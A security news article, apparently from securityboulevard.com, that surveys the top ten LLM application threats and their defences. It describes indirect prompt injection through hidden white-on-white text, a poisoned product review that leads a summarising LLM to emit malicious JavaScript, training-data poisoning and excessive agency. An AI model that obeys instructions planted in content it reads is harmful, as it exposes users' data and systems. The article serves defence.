Even still, the expertise and insights provided, including prevention and mitigation techniques, are highly valuable to anyone building or interfacing with LLM applications.
Prompt injections are maliciously crafted inputs that lead to an LLM performing in unintended ways that expose data, or performing unauthorized actions such as remote code execution.
It's no shock that prompt injection is the number one threat to LLMs because it exploits the design of LLMs rather than a flaw that can be patched.
Here, the LLM user unwittingly provides the LLM with data from a bad actor who has maliciously added LLM prompts into the source.
Most LLMs don't differentiate between user prompts and external data, which is what makes indirect prompt injections possible and a real threat.
The prompt goes unnoticed by the human eye because it's in white lettering on an imperceptibly off-white background, but the LLM still picks it up and complies.
Insecure output handling describes a situation where plugins or other components accept LLM output without secure practices such as sanitization and validation.
Here's one possible insecure output handling scenario: After an indirect prompt injection is left in the review of a product by a threat actor, an LLM tasked with summarizing reviews for a user outputs malicious JavaScript code that is interpreted by the user's browser.
Your models are what they eat, and LLMs ingest quite a bit.
Training data poisoning occurs when data involved in pre-training or fine-tuning an LLM is manipulated to introduce vulnerabilities that affect the model's security, ethical behavior, or performance.
Data poisoning is a tough vulnerability to fight due to the sheer quantity of data that LLMs take in and the difficulty in verifying all of that data.
Failing to limit the number of prompts that are entered, the length of prompts, recursive analysis by the LLM, the number of steps that an LLM can take, or the resources an LLM can use can all result in model denial of service.
Ask the right question and an LLM may end up pouring its heart out, which might include your organization's or other entities' sensitive information, such as proprietary algorithms or confidential information that results in privacy violations.
Insecure plugins is a vulnerability of the plugins you write for LLM systems, rather than third-party plugins that would fall under the supply chain vulnerabilities.
Insecure plugins accept unparameterized text from LLMs without proper sanitization and validation, which can lead to undesirable behavior, including providing a route for prompt injections to lead to remote code execution.
Some examples of excessive agency include using a plugin to let an LLM read files that also allows it to write or delete files, an LLM designed to read a single user's files but has access to every user's files, and a plugin that allows an LLM to elect to delete a user's files without that user's input.
Overreliance happens when users take LLM outputs as gospel without checking the accuracy.
LLMs always have limits in what they can do and what they can do well, but they are often seen by the public as magical bases of knowledge in anything and everything.
Model theft can happen when attackers move through other vulnerabilities of your infrastructure in order to access your model's repository, or even through prompt injection and output observation when attackers glean enough of your LLM's secret sauce that they can build their own shadow model.
Even worse, powerful LLMs can be stolen and reconfigured to perform unethical tasks they'd otherwise refrain from, which is bad for everyone.
This Cyber News was published on securityboulevard.com. Publication date: Thu, 11 Apr 2024 00:43:05 +0000